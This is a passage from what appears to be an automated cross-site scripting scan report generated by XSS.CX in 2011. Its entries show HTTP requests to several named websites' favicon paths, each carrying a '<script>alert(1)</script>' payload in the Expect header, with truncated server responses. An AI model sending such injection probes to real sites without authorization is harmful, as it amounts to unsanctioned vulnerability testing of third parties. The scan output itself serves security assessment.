Confidence:	Certain
Host:	http://www.smartauction.biz
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartauction.biz
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: BigIP
Content-Length: 859
Date: Fri, 01 Apr 2011 16:57:23 GMT
Connection: close

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'/>
<meta http-equiv='Content-Language' content='en'/>
<meta name='Title' content='Online Auto Auctions - Used Car Aucti
...[SNIP]...

19.16. http://www.solow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.solow.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.solow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
ETag: "ArAjUD7pN90"
Last-Modified: Wed, 30 Mar 2011 19:30:28 GMT
Content-Length: 3638
Date: Fri, 01 Apr 2011 17:09:52 GMT

..............h...&... ..............(....... ...........@...............................usr......{{.....9:8..#......H... !c..A..AMw..v.......UW...9......=...V......ZUV. Y...c.. ...#;u.()U..%=....+]
...[SNIP]...

19.17. http://www.tangowire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tangowire.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tangowire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 Bad Request
Server: TangoWire-WebServices/2.0
Date: Fri, 01 Apr 2011 15:27:42 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 950
Connection: close

<HTML><TITLE>Request Error!</TITLE><BODY LINK=#000066 VLINK=#000066><TABLE WIDTH=300 BORDER=1 CELLPADDING=7 CELLSPACING=0 ALIGN=CENTER VALIGN=CENTER><TR><TD ALIGN=CENTER VALIGN=MIDDLE BGCOLOR=#000066>
...[SNIP]...

19.18. http://www.theupperfloor.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theupperfloor.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theupperfloor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"144-1301613686000"
Last-Modified: Thu, 31 Mar 2011 23:21:26 GMT
Content-Length: 144
Date: Fri, 01 Apr 2011 17:23:28 GMT

GIF89a....................os.UZ.... '!.......,..........Uh.....'....=........!@6.....@. ...J...3...k......r< ...i.$..pW}...)..c..X............;

Report generated by XSS.CX at Fri Apr 01 13:25:59 CDT 2011.